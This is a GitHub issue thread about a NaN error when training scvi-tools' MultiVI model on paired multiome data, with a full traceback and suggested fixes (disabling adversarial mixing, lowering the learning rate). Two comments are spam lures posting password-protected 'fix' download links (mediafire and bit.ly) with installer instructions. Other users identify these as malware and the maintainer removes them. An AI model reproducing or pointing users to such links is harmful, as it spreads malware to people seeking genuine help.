### ISSUE TITLE
Bugs related to MultiVI

### ISSUE THREAD

**Issue by GoldenCaterpie** [scverse/scvi-tools#2949] opened 2024-08-27 15:24 UTC
Hello! When running the MultiVI_tutorial.ipynb, I encountered a strange bug.
```python
# We can now use the organizing method from scvi to concatenate these anndata
# adata_mvi = scvi.data.organize_multiome_anndatas(adata_paired, adata_rna, adata_atac)
adata_mvi = scvi.data.organize_multiome_anndatas(adata_paired, None, None)
```
If I modify the code here to only use Multiome data (Gene Expression and Chromatin Accessibility), an error will occur during the subsequent model training regardless of the size of adata_paired. This error always happens under these conditions. However, if adata_rna or adata_atac is added, even with just one cell's information, the model can be trained normally.

I tested this bug in both my environment (Python 3.11) and Google Colab, and it appeared in both.

I would appreciate any guidance on this issue. Thank you very much!

```pytb
[/usr/local/lib/python3.10/dist-packages/scvi/model/_multivi.py](https://localhost:8080/#) in train(self, max_epochs, lr, accelerator, devices, train_size, validation_size, shuffle_set_split, batch_size, weight_decay, eps, early_stopping, save_best, check_val_every_n_epoch, n_steps_kl_warmup, n_epochs_kl_warmup, adversarial_mixing, datasplitter_kwargs, plan_kwargs, **kwargs)
    339             **kwargs,
    340         )
--> 341         return runner()
    342 
    343     @torch.inference_mode()

[/usr/local/lib/python3.10/dist-packages/scvi/train/_trainrunner.py](https://localhost:8080/#) in __call__(self)
     96             self.training_plan.n_obs_validation = self.data_splitter.n_val
     97 
---> 98         self.trainer.fit(self.training_plan, self.data_splitter)
     99         self._update_history()
    100 

[/usr/local/lib/python3.10/dist-packages/scvi/train/_trainer.py](https://localhost:8080/#) in fit(self, *args, **kwargs)
    218                     message="`LightningModule.configure_optimizers` returned `None`",
    219                 )
--> 220             super().fit(*args, **kwargs)

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/trainer/trainer.py](https://localhost:8080/#) in fit(self, model, train_dataloaders, val_dataloaders, datamodule, ckpt_path)
    542         self.state.status = TrainerStatus.RUNNING
    543         self.training = True
--> 544         call._call_and_handle_interrupt(
    545             self, self._fit_impl, model, train_dataloaders, val_dataloaders, datamodule, ckpt_path
    546         )

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/trainer/call.py](https://localhost:8080/#) in _call_and_handle_interrupt(trainer, trainer_fn, *args, **kwargs)
     42         if trainer.strategy.launcher is not None:
     43             return trainer.strategy.launcher.launch(trainer_fn, *args, trainer=trainer, **kwargs)
---> 44         return trainer_fn(*args, **kwargs)
     45 
     46     except _TunerExitException:

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/trainer/trainer.py](https://localhost:8080/#) in _fit_impl(self, model, train_dataloaders, val_dataloaders, datamodule, ckpt_path)
    578             model_connected=self.lightning_module is not None,
    579         )
--> 580         self._run(model, ckpt_path=ckpt_path)
    581 
    582         assert self.state.stopped

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/trainer/trainer.py](https://localhost:8080/#) in _run(self, model, ckpt_path)
    987         # RUN THE TRAINER
    988         # ----------------------------
--> 989         results = self._run_stage()
    990 
    991         # ----------------------------

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/trainer/trainer.py](https://localhost:8080/#) in _run_stage(self)
   1033                 self._run_sanity_check()
   1034             with torch.autograd.set_detect_anomaly(self._detect_anomaly):
-> 1035                 self.fit_loop.run()
   1036             return None
   1037         raise RuntimeError(f"Unexpected state {self.state}")

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/loops/fit_loop.py](https://localhost:8080/#) in run(self)
    200             try:
    201                 self.on_advance_start()
--> 202                 self.advance()
    203                 self.on_advance_end()
    204                 self._restarting = False

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/loops/fit_loop.py](https://localhost:8080/#) in advance(self)
    357         with self.trainer.profiler.profile("run_training_epoch"):
    358             assert self._data_fetcher is not None
--> 359             self.epoch_loop.run(self._data_fetcher)
    360 
    361     def on_advance_end(self) -> None:

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/loops/training_epoch_loop.py](https://localhost:8080/#) in run(self, data_fetcher)
    134         while not self.done:
    135             try:
--> 136                 self.advance(data_fetcher)
    137                 self.on_advance_end(data_fetcher)
    138                 self._restarting = False

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/loops/training_epoch_loop.py](https://localhost:8080/#) in advance(self, data_fetcher)
    240                     batch_output = self.automatic_optimization.run(trainer.optimizers[0], batch_idx, kwargs)
    241                 else:
--> 242                     batch_output = self.manual_optimization.run(kwargs)
    243 
    244         self.batch_progress.increment_processed()

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/loops/optimization/manual.py](https://localhost:8080/#) in run(self, kwargs)
     90         self.on_run_start()
     91         with suppress(StopIteration):  # no loop to break at this level
---> 92             self.advance(kwargs)
     93         self._restarting = False
     94         return self.on_run_end()

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/loops/optimization/manual.py](https://localhost:8080/#) in advance(self, kwargs)
    110 
    111         # manually capture logged metrics
--> 112         training_step_output = call._call_strategy_hook(trainer, "training_step", *kwargs.values())
    113         del kwargs  # release the batch from memory
    114         self.trainer.strategy.post_training_step()  # unused hook - call anyway for backward compatibility

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/trainer/call.py](https://localhost:8080/#) in _call_strategy_hook(trainer, hook_name, *args, **kwargs)
    307 
    308     with trainer.profiler.profile(f"[Strategy]{trainer.strategy.__class__.__name__}.{hook_name}"):
--> 309         output = fn(*args, **kwargs)
    310 
    311     # restore current_fx when nested context

[/usr/local/lib/python3.10/dist-packages/lightning/pytorch/strategies/strategy.py](https://localhost:8080/#) in training_step(self, *args, **kwargs)
    380             if self.model != self.lightning_module:
    381                 return self._forward_redirection(self.model, self.lightning_module, "training_step", *args, **kwargs)
--> 382             return self.lightning_module.training_step(*args, **kwargs)
    383 
    384     def post_training_step(self) -> None:

[/usr/local/lib/python3.10/dist-packages/scvi/train/_trainingplans.py](https://localhost:8080/#) in training_step(self, batch, batch_idx)
    565             opt1, opt2 = opts
    566 
--> 567         inference_outputs, _, scvi_loss = self.forward(batch, loss_kwargs=self.loss_kwargs)
    568         z = inference_outputs["z"]
    569         loss = scvi_loss.loss

[/usr/local/lib/python3.10/dist-packages/scvi/train/_trainingplans.py](https://localhost:8080/#) in forward(self, *args, **kwargs)
    276     def forward(self, *args, **kwargs):
    277         """Passthrough to the module's forward method."""
--> 278         return self.module(*args, **kwargs)
    279 
    280     @torch.inference_mode()

[/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py](https://localhost:8080/#) in _wrapped_call_impl(self, *args, **kwargs)
   1551             return self._compiled_call_impl(*args, **kwargs)  # type: ignore[misc]
   1552         else:
-> 1553             return self._call_impl(*args, **kwargs)
   1554 
   1555     def _call_impl(self, *args, **kwargs):

[/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py](https://localhost:8080/#) in _call_impl(self, *args, **kwargs)
   1560                 or _global_backward_pre_hooks or _global_backward_hooks
   1561                 or _global_forward_hooks or _global_forward_pre_hooks):
-> 1562             return forward_call(*args, **kwargs)
   1563 
   1564         try:

[/usr/local/lib/python3.10/dist-packages/scvi/module/base/_decorators.py](https://localhost:8080/#) in auto_transfer_args(self, *args, **kwargs)
     30         # decorator only necessary after training
     31         if self.training:
---> 32             return fn(self, *args, **kwargs)
     33 
     34         device = list({p.device for p in self.parameters()})

[/usr/local/lib/python3.10/dist-packages/scvi/module/base/_base_module.py](https://localhost:8080/#) in forward(self, tensors, get_inference_input_kwargs, get_generative_input_kwargs, inference_kwargs, generative_kwargs, loss_kwargs, compute_loss)
    201             another return value.
    202         """
--> 203         return _generic_forward(
    204             self,
    205             tensors,

[/usr/local/lib/python3.10/dist-packages/scvi/module/base/_base_module.py](https://localhost:8080/#) in _generic_forward(module, tensors, inference_kwargs, generative_kwargs, loss_kwargs, get_inference_input_kwargs, get_generative_input_kwargs, compute_loss)
    741 
    742     inference_inputs = module._get_inference_input(tensors, **get_inference_input_kwargs)
--> 743     inference_outputs = module.inference(**inference_inputs, **inference_kwargs)
    744     generative_inputs = module._get_generative_input(
    745         tensors, inference_outputs, **get_generative_input_kwargs

[/usr/local/lib/python3.10/dist-packages/scvi/module/base/_decorators.py](https://localhost:8080/#) in auto_transfer_args(self, *args, **kwargs)
     30         # decorator only necessary after training
     31         if self.training:
---> 32             return fn(self, *args, **kwargs)
     33 
     34         device = list({p.device for p in self.parameters()})

[/usr/local/lib/python3.10/dist-packages/scvi/module/_multivae.py](https://localhost:8080/#) in inference(self, x, y, batch_index, cont_covs, cat_covs, label, cell_idx, n_samples)
    600 
    601         # Z Encoders
--> 602         qzm_acc, qzv_acc, z_acc = self.z_encoder_accessibility(
    603             encoder_input_accessibility, batch_index, *categorical_input
    604         )

[/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py](https://localhost:8080/#) in _wrapped_call_impl(self, *args, **kwargs)
   1551             return self._compiled_call_impl(*args, **kwargs)  # type: ignore[misc]
   1552         else:
-> 1553             return self._call_impl(*args, **kwargs)
   1554 
   1555     def _call_impl(self, *args, **kwargs):

[/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py](https://localhost:8080/#) in _call_impl(self, *args, **kwargs)
   1560                 or _global_backward_pre_hooks or _global_backward_hooks
   1561                 or _global_forward_hooks or _global_forward_pre_hooks):
-> 1562             return forward_call(*args, **kwargs)
   1563 
   1564         try:

[/usr/local/lib/python3.10/dist-packages/scvi/nn/_base_components.py](https://localhost:8080/#) in forward(self, x, *cat_list)
    282         q_m = self.mean_encoder(q)
    283         q_v = self.var_activation(self.var_encoder(q)) + self.var_eps
--> 284         dist = Normal(q_m, q_v.sqrt())
    285         latent = self.z_transformation(dist.rsample())
    286         if self.return_dist:

[/usr/local/lib/python3.10/dist-packages/torch/distributions/normal.py](https://localhost:8080/#) in __init__(self, loc, scale, validate_args)
     55         else:
     56             batch_shape = self.loc.size()
---> 57         super().__init__(batch_shape, validate_args=validate_args)
     58 
     59     def expand(self, batch_shape, _instance=None):

[/usr/local/lib/python3.10/dist-packages/torch/distributions/distribution.py](https://localhost:8080/#) in __init__(self, batch_shape, event_shape, validate_args)
     68                 valid = constraint.check(value)
     69                 if not valid.all():
---> 70                     raise ValueError(
     71                         f"Expected parameter {param} "
     72                         f"({type(value).__name__} of shape {tuple(value.shape)}) "

ValueError: Expected parameter loc (Tensor of shape (128, 17)) of distribution Normal(loc: torch.Size([128, 17]), scale: torch.Size([128, 17])) to satisfy the constraint Real(), but found invalid values:
tensor([[nan, nan, nan,  ..., nan, nan, nan],
        [nan, nan, nan,  ..., nan, nan, nan],
        [nan, nan, nan,  ..., nan, nan, nan],
        ...,
        [nan, nan, nan,  ..., nan, nan, nan],
        [nan, nan, nan,  ..., nan, nan, nan],
        [nan, nan, nan,  ..., nan, nan, nan]], device='cuda:0',
       grad_fn=<AddmmBackward0>)
```
#### Versions:

> VERSION 1.1.6

![image](https://github.com/user-attachments/assets/7011c535-5523-4c8a-8ad0-5e9456f57e62)

![image](https://github.com/user-attachments/assets/3fca3205-db05-481b-a730-419896d7952c)

**Comment by yiweifengyan** [comment] 2024-08-27 15:49
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by canergen** [comment] 2024-08-27 15:50
Hi. Potential duplicate of: https://github.com/scverse/scvi-tools/issues/2262 can you disable adversarial mixing? This change will be released in version 1.2y

**Comment by GoldenCaterpie** [comment] 2024-08-27 16:14
> Hi. Potential duplicate of: #2262 can you disable adversarial mixing? This change will be released in version 1.2y

It seems to work! Thank you very much!

**Closed** 2024-08-27 16:15 UTC
Labels: bug

**Comment by c0ffincolors** [comment] 2024-08-27 16:23
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by canergen** [comment] 2024-08-27 16:26
There are several different users posting data here. @GoldenCaterpie is this related to your issue? It doesn't make sense to me. Could the users otherwise provide the issue that there are getting?

**Comment by Josh65-2201** [comment] 2024-08-27 16:38
It malware that spammed all over GitHub, don't downloaded it and report the user

**Comment by FunkyFr3sh** [comment] 2024-08-27 16:39
Apperently GoldenCaterpie was hacked as well - his account is now posting the same link too

**Comment by canergen** [comment] 2024-08-27 16:40
Deleted the post and reported it to reduce risk for other users.

**Comment by GoldenCaterpie** [comment] 2024-08-27 17:39
> The post above doesn't make sense. @GoldenCaterpie is this related to your issue? It doesn't make sense to me to even have an installer (haven't downloaded due to this). Could the users otherwise provide the issue that they are getting?

Sry but I was also hacked but now I has changed my password :(

**Comment by MPebworthEpana** [comment] 2025-05-16 01:50
This error continues to be an issues in scVI v 1.3. And I need adversarial_mixing on, because the CITE-seq and scRNA-seq data simply aren't mixing. It's a near perfect seperation. 

Is there a way to get adversarial mixing working?

**Comment by MPebworthEpana** [comment] 2025-05-16 03:07
Sorry, I fixed the error by lowering the learning rate to 1e-6.
